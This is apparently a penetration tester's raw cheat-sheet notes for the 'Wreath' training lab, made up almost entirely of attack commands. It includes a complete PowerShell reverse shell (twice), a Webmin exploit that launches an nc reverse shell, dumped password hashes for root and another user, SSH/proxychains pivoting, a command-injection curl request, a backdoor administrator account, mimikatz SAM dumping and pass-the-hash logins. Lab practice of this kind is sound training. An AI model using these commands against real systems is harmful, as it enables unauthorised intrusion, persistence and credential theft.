Wreath

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('10.200.105.200',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"// wreath
python3 webmin-1.890_exploit.py thomaswreath.thm 10000 "/root/prod-serv/nc 10.50.106.215 4444 -e /bin/bash"



root:$6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRVNq6/6g0PxK9VqSdy47/qKXad1::0:99999:7:::


twreath:$6$0my5n311RD7EiK3J$zVFV3WAPCm/dBxzz0a7uDwbQenLohKiunjlDonkqx1huhjmFYZe0RmCPsHmW3OnWYwf8RWPdXAdbtYpkJCReg.::0:99999:7:::

which python python2 python3

# upgrade shell
/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'


80,3389,5357,5985

ssh -D 1080 root@victim -i id_rsa_kali -fN
ensure to edit proxychains 
sudo vi /etc/proxychains.conf
socks4  127.0.0.1 1080

run nmap with proxychains
sudo proxychains nmap -Pn -sT -v -p 22,80,3389 10.200.105.150

// top 50 ports
//sudo proxychains nmap -sT -Pn -n <targetIP> --top-ports 50

//xfreerdp /f /u:Tester /p:1234 /v:192.168.0.101
// simple port forward

ssh -L 8000:10.200.105.150:80 root@10.200.105.200 -fN -i /home/kali/.ssh/id_rsa

searchsploit -m 43777

sudo python3 43777.py

curl -X POST http://IP/web/exploit.php -d "a=COMMAND"

https://www.urlencoder.org/

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('10.200.105.200',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


net user hacker1 pass /add
net localgroup Administrators hacker1 /add
net localgroup "Remote Management Users" hacker1 /add
xfreerdp /v:10.200.105.150 /u:hacker1 /p:pass
sudo proxychains xfreerdp /v:10.200.105.150 /u:hacker1 /p:pass
xfreerdp /v:10.200.105.150 /u:hacker1 /p:pass +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

mimikatz
privilege::debug
token::elevate
lsadump::sam


// WinRM Remote Management has to listen on 5987
evil-winrm -u Administrator -H ADMIN_HASH -i IP


Import-Module .\Invoke-Portscan.ps1
$a = Invoke-Portscan -hosts "ip"